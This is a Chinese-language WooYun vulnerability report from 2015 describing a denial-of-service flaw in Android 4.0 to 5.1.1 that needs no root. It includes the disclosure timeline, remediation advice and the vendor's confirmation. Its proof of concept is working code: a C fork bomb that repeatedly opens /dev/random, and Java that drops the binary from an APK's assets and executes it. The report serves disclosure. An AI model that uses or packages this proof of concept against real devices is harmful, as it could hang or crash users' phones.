无需root权限恶意apk可导致安卓系统DOS | wooyun-2015-0132485| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132485

漏洞标题：无需root权限恶意apk可导致安卓系统DOS

漏洞作者：成王败寇

提交时间：2015-08-13 13:57

修复时间：2015-11-12 16:06

公开时间：2015-11-12 16:06

漏洞类型：拒绝服务

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-13：细节已通知厂商并且等待厂商处理中
2015-08-14： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-08-17：细节向第三方安全合作伙伴开放
2015-10-08：细节向核心白帽子及相关领域专家公开
2015-10-18：细节向普通白帽子公开
2015-10-28：细节向实习白帽子公开
2015-11-12：细节向公众公开

简要描述：

利用该漏洞的恶意APK程序，无需root权限即可使手机呆掉或导致异常重启，测试部分机型连电源键都无响应（三星S5、HTC刷CM10），只能扣电池……。
影响系统范围目前只测试过安卓4.0以上，包括5.1.1及最新版M系统。

详细说明：

该漏洞由系统级Race Condition引起，主要利用暴力fork子进程的方式打开设备文件并占用，由于多个系统级lib共享库对于资源申请失败处理流程不当，引发整个安卓系统进程以雪崩的方式结束，从而DOS安卓系统，整个过程无需root权限，也不需要申请任何敏感权限。

漏洞证明：

POC代码说明：首先使用NDK编译native部分C代码，然后由java部分负责释放并运行native程序trigger漏洞。
native部分C代码：
<code>
int main(int argc, char **argv, char **env)
{
	while(1)
	{
		fork();
		open("/dev/random",O_RDONLY);
	}
	return 0;
}

java部分负责释放并运行native程序：

void ReleaseBinAndRun() {
		AssetManager aManager = getAssets();
		ApplicationInfo appInfo = this.getApplicationInfo();
		
		try {
			InputStream in = aManager.open("RaceCondition");
			boolean bSuscess = true;
			String path = getFilesDir().getPath();
			path = path.substring(0, path.lastIndexOf("/", path.length() - 1));
			File file = new File(path, "e");
			// delete old file
			
			if (!file.exists())
				bSuscess = file.createNewFile();
				file.setExecutable(true, false);
			FileOutputStream out = new FileOutputStream(file);
			int c;
			byte buffer[] = new byte[1024];
			while ((c = in.read(buffer)) != -1) {
				for (int i = 0; i < c; i++)
					out.write(buffer[i]);
			}
			in.close();
			out.close();
			Runtime.getRuntime().exec(file.getAbsolutePath());
			// RootUtils.RootCommand("" + file.getAbsolutePath());
		} catch (Exception e) {
			// TODO: handle exception
			
			e.printStackTrace();
		}
	}

</code>

修复方案：

为系统关键进程保留足够的资源。
进程在申请资源失败后的处理流程需优化。

版权声明：转载请注明来源成王败寇@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-08-14 16:04

厂商回复：

CNVD确认所述情况，已经由CNVD通过网站公开联系方式（或以往建立的处置渠道）向网站管理单位（软件生产厂商）通报。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132485

漏洞标题：无需root权限恶意apk可导致安卓系统DOS

相关厂商：谷歌

漏洞作者：成王败寇

提交时间：2015-08-13 13:57

修复时间：2015-11-12 16:06

公开时间：2015-11-12 16:06

漏洞类型：拒绝服务

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源成王败寇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132485

漏洞标题：无需root权限恶意apk可导致安卓系统DOS

相关厂商：谷歌

漏洞作者： 成王败寇

提交时间：2015-08-13 13:57

修复时间：2015-11-12 16:06

公开时间：2015-11-12 16:06

漏洞类型：拒绝服务

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0132485"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 成王败寇@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：成王败寇

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源成王败寇@乌云